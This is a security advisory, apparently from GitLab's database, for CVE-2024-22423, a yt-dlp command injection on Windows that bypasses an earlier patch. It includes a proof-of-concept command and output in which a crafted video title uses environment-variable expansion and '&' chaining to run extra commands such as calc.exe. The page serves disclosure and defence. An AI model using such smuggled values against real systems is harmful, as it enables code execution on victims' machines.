CVE-2024-22423: yt-dlp: `--exec` command injection when using `%q` in yt-dlp on Windows (Bypass of CVE-2023-40581)
The patch that addressed CVE-2023-40581 attempted to prevent RCE when using --exec with %q by replacing double quotes with two double quotes.
However, this escaping is not sufficient, and still allows expansion of environment variables.
Support for output template expansion in --exec, along with this vulnerable behavior, was added to yt-dlp in version 2021.04.11.
> yt-dlp "https://youtu.be/42xO6rVqf2E" --ignore-config -f 18 --exec "echo %(title)q"
[youtube] Extracting URL: https://youtu.be/42xO6rVqf2E
[youtube] 42xO6rVqf2E: Downloading webpage
[youtube] 42xO6rVqf2E: Downloading ios player API JSON
[youtube] 42xO6rVqf2E: Downloading android player API JSON
[youtube] 42xO6rVqf2E: Downloading m3u8 information
[info] 42xO6rVqf2E: Downloading 1 format(s): 18
[download] Destination: %CMDCMDLINE:~-1%&echo pwned&calc.exe [42xO6rVqf2E].mp4
[download] 100% of 126.16KiB in 00:00:00 at 2.46MiB/s
[Exec] Executing command: echo "%CMDCMDLINE:~-1%&echo pwned&calc.exe"
""
pwned
References
- github.com/advisories/GHSA-hjq6-52gw-2g7p
- github.com/yt-dlp/yt-dlp
- github.com/yt-dlp/yt-dlp/commit/de015e930747165dbb8fcd360f8775fd973b7d6e
- github.com/yt-dlp/yt-dlp/commit/ff07792676f404ffff6ee61b5638c9dc1a33a37a
- github.com/yt-dlp/yt-dlp/releases/tag/2021.04.11
- github.com/yt-dlp/yt-dlp/releases/tag/2024.04.09
- github.com/yt-dlp/yt-dlp/security/advisories/GHSA-42h4-v29r-42qg
- github.com/yt-dlp/yt-dlp/security/advisories/GHSA-hjq6-52gw-2g7p
- nvd.nist.gov/vuln/detail/CVE-2024-22423
Detect and mitigate CVE-2024-22423 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →